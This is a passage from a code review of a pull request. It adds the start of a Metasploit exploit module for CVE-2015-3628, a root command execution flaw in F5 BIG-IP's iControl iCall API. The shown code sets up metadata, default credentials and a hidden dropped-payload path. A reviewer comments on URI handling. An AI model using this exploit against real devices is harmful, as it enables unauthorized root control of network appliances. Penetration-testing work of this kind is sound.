modules/exploits/linux/http/f5_icall_cmd.rb

```diff
@@ -0,0 +1,322 @@
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "F5 iControl iCall::Script Root Command Execution",
+      'Description'    => %q{
+        This module exploits an authenticated a privilege escalation vulnerability
+        in the iControl API on the F5 BIG-IP LTM (and likely other F5 devices). The attacker needs valid
+        credentials and the Resource Administrator role. The exploit should work on BIG-IP 11.3.0 - 11.6.0,
+        (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references for more details)
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'tom' # Discovery, Metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2015-3628'],
+          ['URL', 'https://support.f5.com/kb/en-us/solutions/public/16000/700/sol16728.html'],
+          ['URL', 'https://gdssecurity.squarespace.com/labs/2015/9/8/f5-icallscript-privilege-escalation-cve-2015-3628.html']
+        ],
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          ['F5 BIG-IP LTM 11.x', {}]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Sep 3 2015",
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          Opt::RPORT(443),
+          OptBool.new('SSL', [true, 'Use SSL', true]),
+          OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),
+          OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
+          OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
+        ], self.class)
+      register_advanced_options(
+        [
+          OptInt.new('INTERVAL', [ true, 'Time interval before the iCall::Handler is called, in seconds', 3 ]),
+          OptString.new('PATH', [true, 'Filesystem path for the dropped payload', '/tmp']),
+          OptString.new('FILENAME', [false, 'File name of the dropped payload', '.9cdfb439c7876e70']),
+          OptInt.new('ARG_MAX', [true, 'Command line lenght limit', 131072])
+        ], self.class)
+  end
+
+  def xml_add_namespaces(xml)
+      ns = xml.doc.root.add_namespace_definition("soapenv","http://schemas.xmlsoap.org/soap/envelope/")
+      xml.doc.root.namespace = ns
+      xml.doc.root.add_namespace_definition("xsi", "http://www.w3.org/2001/XMLSchema-instance")
+      xml.doc.root.add_namespace_definition("xsd", "http://www.w3.org/2001/XMLSchema")
+      xml.doc.root.add_namespace_definition("scr", "urn:iControl:iCall/Script")
+      xml.doc.root.add_namespace_definition("soapenc", "http://schemas.xmlsoap.org/soap/encoding")
+      xml.doc.root.add_namespace_definition("per", "urn:iControl:iCall/PeriodicHandler")
+      return xml
+  end
+
+  def send_soap_request(pay)
+      res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
```

Comment:
Here and the one or maybe two other places where you are sending the HTTP requests, IMO you should be using `normalize_uri(target_uri.path)`, and set the default `TARGETURI` to be `/iControl/iControlPortal.cgi`.  This way, if for some crazy reason a user is trying to target a vulnerable F5 device that is configured differently or is itself behind a load balancer/proxy of some sort, perhaps one that maps a request to `/secret/f5`externally to `/iControl/iControl.cgi` internally, a user could set `TARGET_URI` to the exact URI (in this case, `/secret/f5`) and should get the expected results.